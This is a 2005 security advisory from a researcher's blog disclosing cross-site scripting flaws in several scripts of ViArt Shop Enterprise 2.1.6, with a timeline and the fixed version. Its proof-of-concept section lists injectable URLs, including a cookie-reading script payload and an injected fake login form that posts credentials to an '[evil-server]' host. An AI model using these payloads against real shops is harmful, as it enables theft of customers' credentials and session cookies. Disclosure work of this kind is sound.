#########################################################
ViArt Shop Enterprise multiple variable XSS
vendor: http://www.codetosell.com
advisory:http://lostmon.blogspot.com/2005/04/
viart-shop-enterprise-multiple.html
vendor informed: yes exploit available:yes
OSVDB ID:15951, 15952 ,15953, 15954 , 15955 , 15956 , 15957, 15958
Securitytracker:1013853
Secunia:SA15181
BID:13462
#########################################################
ViArt Shop contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate multiple variables upon submission to the multiple scripts.
This could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust relationship
between the browser and the server,leading to a loss of integrity.
##########
versions:
##########
ViArt Shop Enterprise v.2.1.6 afected
also is posible prior versions are afected too.
##########
Solution:
##########
Update to version ViArt Shop version 2.1.8
#########
timeline:
#########
discovered : 25 april 2005
vendor notify :28 april 2005
vendor response :18-10-2005
vendor fix:05-05-2005
disclosure:29 april 2005
########## Proof of concept ##############
############
basket.php
###########
http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0
[XSS-CODE]%26search_string%3Dss%26search_category_id%3D
http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0%26
search_string%3D[XSS-CODE]%26search_string%3Dss%26
search_category_id%3D%26search_category_id%3D
http://[victim]/basket.php?rp=products.php%3Fcategory_id
%3D0%26search_string%3Dss%26search_string%3Dss%26
search_category_id[XSS-CODE]%26search_category_id%3D
http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0%26
search_string%3Dss%26search_string%3Dss%26
search_category_id%3D[XSS-CODE]%26search_category_id%3D
http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0%26
search_string%3Dss%26search_string%3Dss%26search_category_id%3D
%26search_category_id%3D[XSS-CODE]
###########
forum.php
###########
http://[victim]/forum_new_thread.php
form fields nickname,email,topic and message are vulnerables to XSS
for exploiting email you can use:
[XSS-CODE]@email.com or email@[XSS-CODE].com
http://[victim]/forum_thread.php?thread_id=2
wen reply to a post nickname and message fields are vulnerable to XSS
all of this codes are executed wen a user view the forum or wen admin
look in "admin panel" for "forum threads" in forum menu
###########
page.php
###########
http://[victim]/page.php?page=about%22%3E
%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[victim]/page.php?page=%3Cp%3Ean%20eror%20was%20send
%20to%20webmaster,%20please%20insert%20your%20username%20
and%20password%20,%20and%20continue%20shopping%20%3Cform
%20action=%22http://[evil-server]/save.php%22%20method=%22
post%22%3EUsername:%3Cinput%20aame=%22username%22%20type
=%22text%22%20maxlength=%2230%22%3E%3Cbr%3EPassword:%3C
input%20name=%22password%22%20type=%22text%22%20maxlength
=%2230%22%3E%3Cbr%3E%3Cinput%20name=%22login%22%20type=
%22submit%22%20value=%22Login%22%3E%3C/form%3E
############
reviews.php
############
http://[victim]/reviews.php?category_id=0&item_id=4[XSS-CODE]
http://[victim]/reviews.php?category_id=0[XSS-CODE]&item_id=4
http://[victim]/reviews.php?filter=0&item_id=4
[XSS-CODE]&category_id=0
#################
products.php
#################
http://[victim]/product_details.php?item_id=4
&category_id=0[XSS-CODE]
http://[victim]/products.php?category_id=13[XSS-CODE]
http://[victim]/products.php?category_id=0&search_string=
[XSS-CODE]&search_category_id=
##################
news_view.php
##################
http://[victim]/news_view.php?news_id=3&rp=
news.php[XSS-CODE]&page=1
http://[victim]/news_view.php?news_id=3&rp=
news.php&page=1[XSS-CODE]
################# end #########################
thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to icaro he is investigate with me.
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente.
Subscribe to:
Posts (Atom)